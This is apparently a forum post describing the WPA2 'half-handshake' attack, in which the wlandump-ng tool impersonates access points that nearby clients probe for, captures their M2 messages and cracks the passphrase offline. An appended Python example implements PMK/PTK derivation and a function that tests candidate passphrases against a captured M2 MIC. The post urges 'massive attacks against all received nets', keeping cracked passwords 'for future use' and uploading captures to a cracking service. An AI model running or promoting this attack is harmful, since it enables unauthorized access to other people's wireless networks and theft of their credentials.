WPA2 Half-Handshake
#5
Well, answering every probe request makes it possible that a client will try to connect to us. In that case, we are the access point (ap) which the client expected to see. This is an attempt to get the M2 of the client (and that works perfectly).
The authentication process is very simple to understand:
the client sends a probe request
the ap responds sending a probe response
the client sends an authentication request
the ap responds to the authentication request
the client sends an association request
the ap acknowledges and sends an authentication response followed by the M1
the client acknowledges and sends the M2
if the M2 is ok, the ap acknowledges and sends the M3 (that means the client is authenticated)
if the M3 is ok the client acknowledges and sends the M4 (that means the ap is authenticated)
now the data transfer can begin

Using the defaults, a client probes every ap which has an entry in his wpa_supplicant.conf.
A stupid client also probes his 5GHz ap on 2.4GHz!
wlandump-ng accepts and sends a M1 (we are just friendly and give the client what he wants).
After receiving this M1 the client sends us his M2, because he can't resist us. So we receive a valid M2, calculated from an entry in his wpa_supplicant.conf.
wlandump-ng will show us this (using the -s xx option):
transmitted m1/received appropriate m2...: 343/719

and the regular messages from a real ap connected to a client:
received regular m1/m2/m3/m4.............: 146/98/143/68


Since we know our mac and our anonce (both are part of the authentication process and the calculation of the keys), we can start to crack the hash without the M1 of the legitimate ap.


Keep in mind:
1) This attack works only on the message_pair M1/M2.
We can not be sure that the network we cracked is the network we expected to crack (for example if different networks use the same essid: dlink, linksys, home, ASUS).
But never mind, we cracked a network, we got a password and we can save the password to our database for analyses or future use.
2) The aim is not to crack a single net using a single password. The aim is to break the system by running massive attacks against all received nets. So we are able to calculate default keyspaces, default passwords, default password calculation algos, most used passwords, and more.... (Alex does a really good job: https://github.com/RealEnder/routerkeygenPC).
So please upload your caps here:
(wlancap2hcx: -p <file> : output merged pcap file (upload this file to http://wpa-sec.stanev.org))


The -b option (beaconing on the last 10 probes) will seduce clients which do not send probes yet to probe us and then to connect to us.
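The post's key claim is that our own MAC and our own ANONCE are all the "AP side" input that the M2 MIC depends on, so the legitimate ap's M1 is never needed; and that the PMK is derived from the ESSID alone, which is why two networks sharing an essid cannot be told apart from the M2 (point 1 above). The following example, added here and not part of ZerBea's post, wlandump-ng or hcxtools, walks the IEEE 802.11i key derivation through for one constructed M2: PMK via PBKDF2-HMAC-SHA1, PTK via the PRF-512, KCK as the first 16 bytes, and the EAPOL-Key MIC as HMAC-SHA1 over the frame with the MIC field zeroed (key descriptor version 2, as used with CCMP). All MACs, nonces, the essid and the passphrase are constructed sample values; the M2 frame is built with an empty key-data field, where a real M2 carries the client's RSN IE, and that does not change the MIC procedure. The same function lets a network operator check whether a given passphrase is the one a capture was produced with.

```python
import hashlib
import hmac

# Constructed sample values (not from the original post or any real capture).
ESSID = "dlink"                          # essid from the client's wpa_supplicant.conf
PASSPHRASE = "example-passphrase-2017"   # the client's stored passphrase for that essid
AP_MAC = bytes.fromhex("020000aa0001")   # our MAC, i.e. the ap that answered the probe
STA_MAC = bytes.fromhex("020000bb0002")  # the client's MAC
ANONCE = bytes(range(32))                # the nonce we chose for our M1
SNONCE = bytes(range(32, 64))            # the nonce the client chose for its M2

# Offsets inside an EAPOL-Key frame: 4-byte EAPOL header, then descriptor type (1),
# key info (2), key length (2), replay counter (8), nonce (32), IV (16), RSC (8),
# ID (8), MIC (16), key data length (2), key data.
NONCE_OFFSET = 17
MIC_OFFSET = 81


def wpa2_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 rounds, 32 bytes). No BSSID involved."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MACs and both nonces; the first 16 bytes are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_key_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC for key descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_m2(passphrase, essid, ap_mac, sta_mac, anonce, snonce, key_data=b"") -> bytes:
    """Supplicant side: the M2 a client sends after receiving our M1 (simplified, no RSN IE)."""
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: version 2, pairwise, MIC bit set
            + b"\x00\x00"                 # key length (0 in M2)
            + (1).to_bytes(8, "big")      # replay counter copied from our M1
            + snonce
            + b"\x00" * 16                # key IV
            + b"\x00" * 8                 # key RSC
            + b"\x00" * 8                 # key ID
            + b"\x00" * 16                # MIC placeholder, filled in below
            + len(key_data).to_bytes(2, "big")
            + key_data)
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type EAPOL-Key
    kck = wpa2_ptk(wpa2_pmk(passphrase, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_key_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def m2_matches_passphrase(candidate, essid, ap_mac, sta_mac, anonce, m2_frame) -> bool:
    """Verifier side: does the candidate passphrase reproduce the MIC carried in this M2?

    Everything needed is in our M1 (ap_mac, anonce) and the client's M2 (sta_mac, snonce, MIC);
    the essid comes from the probe exchange. Nothing from the legitimate ap is used.
    """
    snonce = m2_frame[NONCE_OFFSET:NONCE_OFFSET + 32]
    kck = wpa2_ptk(wpa2_pmk(candidate, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_key_mic(kck, m2_frame), m2_frame[MIC_OFFSET:MIC_OFFSET + 16])


if __name__ == "__main__":
    m2 = build_m2(PASSPHRASE, ESSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    print("M2 MIC:", m2[MIC_OFFSET:MIC_OFFSET + 16].hex())
    print("stored passphrase matches M2:", m2_matches_passphrase(PASSPHRASE, ESSID, AP_MAC, STA_MAC, ANONCE, m2))
    print("other passphrase matches M2: ", m2_matches_passphrase("not-it", ESSID, AP_MAC, STA_MAC, ANONCE, m2))
```

Note that `m2_matches_passphrase` takes the essid but no BSSID of any real network: a client that stores the same passphrase under the essid "dlink" for two different networks produces an M2 that verifies identically for both, which is exactly the ambiguity described in point 1.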

